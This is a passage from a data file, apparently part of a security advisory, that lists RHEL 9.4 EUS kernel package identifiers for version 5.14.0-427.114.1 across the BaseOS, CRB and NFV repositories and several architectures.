"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
